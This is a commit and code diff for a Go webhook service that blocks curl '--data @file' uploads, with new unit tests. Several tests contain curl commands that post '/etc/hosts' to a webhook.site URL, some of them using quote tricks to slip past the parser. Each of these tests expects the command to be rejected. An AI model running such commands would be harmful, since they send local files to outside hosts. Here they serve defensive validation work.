fix(webhook-service): Disallow @ file uploads inside data block (#7158

)

* added failing test cases

Signed-off-by: warber <bernd.warmuth@dynatrace.com>

* fix: disallow @ in data block

Signed-off-by: warber <bernd.warmuth@dynatrace.com>

* fixed if condition when checking for data block

Signed-off-by: warber <bernd.warmuth@dynatrace.com>

* additional tests

Signed-off-by: warber <bernd.warmuth@dynatrace.com>

* incorp. review comment

Signed-off-by: warber <bernd.warmuth@dynatrace.com>

webhook-service/lib/curl_executor.go

@@ -155,12 +155,19 @@ func (ce *CmdCurlExecutor) validateURL(curlCmd string) error {
 }
 
 func (ce *CmdCurlExecutor) validateCurlOptions(args []string) error {
-	for _, arg := range args {
+	for i, arg := range args {
 		for _, o := range ce.unAllowedOptions {
 			if strings.HasPrefix(arg, o) {
 				return fmt.Errorf("curl command contains invalid option '%s'", o)
 			}
 		}
+		// disallow usage of @ inside --data for posting local files
+		if (arg == "--data" || arg == "-d") && len(args) >= i+1 {
+			dataArgValue := args[i+1]
+			if strings.HasPrefix(dataArgValue, "@") {
+				return fmt.Errorf("file uploads using @ in --data is not allowed")
+			}
+		}
 	}
 	return nil
 }
@@ -246,5 +253,15 @@ func parseCommandLine(command string) ([]string, error) {
 		args = append(args, current)
 	}
 
-	return args, nil
+	return deleteEmpty(args), nil
+}
+
+func deleteEmpty(s []string) []string {
+	var r []string
+	for _, str := range s {
+		if str != "" {
+			r = append(r, str)
+		}
+	}
+	return r
 }

webhook-service/lib/curl_executor_test.go

@@ -61,12 +61,12 @@ func TestCmdCurlExecutor_Curl(t *testing.T) {
 		{
 			name: "valid request - append --fail-with-body flag",
 			args: args{
-				curlCmd: `curl -X POST -H 'Content-type: application/json' --data '{\"text\":\"Hello, World!\"}' https://my.hook.com/foo`,
+				curlCmd: `curl -X POST -H 'Content-type: application/json' --data '{\"text\":\"Hello, World!\"}' https://name:passwd@my.hook.com/foo`,
 			},
 			want:          "success",
 			shouldExecute: true,
 			wantPassedArgs: []string{
-				"-X", "POST", "-H", "Content-type: application/json", "--data", `{\"text\":\"Hello, World!\"}`, "https://my.hook.com/foo", "--fail-with-body",
+				"-X", "POST", "-H", "Content-type: application/json", "--data", `{\"text\":\"Hello, World!\"}`, "https://name:passwd@my.hook.com/foo", "--fail-with-body",
 			},
 			wantErr: false,
 		},
@@ -181,6 +181,51 @@ func TestCmdCurlExecutor_Curl(t *testing.T) {
 			shouldExecute: false,
 			wantErr:       true,
 		},
+		{
+			name: "try to upload file using @ notation in data part 1 - should return error",
+			args: args{
+				curlCmd: `curl -X POST -H 'token: abcd' --data '@/etc/hosts https://webhook.site/2775'`,
+			},
+			want:          "",
+			shouldExecute: false,
+			wantErr:       true,
+		},
+		{
+			name: "try to upload file using @ notation in data part 2 - should return error",
+			args: args{
+				curlCmd: `curl -X POST -H 'token: abcd' --data @/etc/hosts https://webhook.site/2775`,
+			},
+			want:          "",
+			shouldExecute: false,
+			wantErr:       true,
+		},
+		{
+			name: "try to upload file using @ notation in data part 3 - should return error",
+			args: args{
+				curlCmd: `curl -X POST -H 'token: abcd' --data ''@/etc/hosts https://webhook.site/2775`,
+			},
+			want:          "",
+			shouldExecute: false,
+			wantErr:       true,
+		},
+		{
+			name: "try to upload file using @ notation in data part 3 - should return error",
+			args: args{
+				curlCmd: `curl -X POST -H 'token: abcd' --data ''''@/etc/hosts https://webhook.site/2775`,
+			},
+			want:          "",
+			shouldExecute: false,
+			wantErr:       true,
+		},
+		{
+			name: "try to upload file using @ notation in data part 3 - should return error",
+			args: args{
+				curlCmd: `curl -X POST -H 'token: abcd' --data ''''''@/etc/hosts https://webhook.site/2775'`,
+			},
+			want:          "",
+			shouldExecute: false,
+			wantErr:       true,
+		},
 		{
 			name: "unclosed quote",
 			args: args{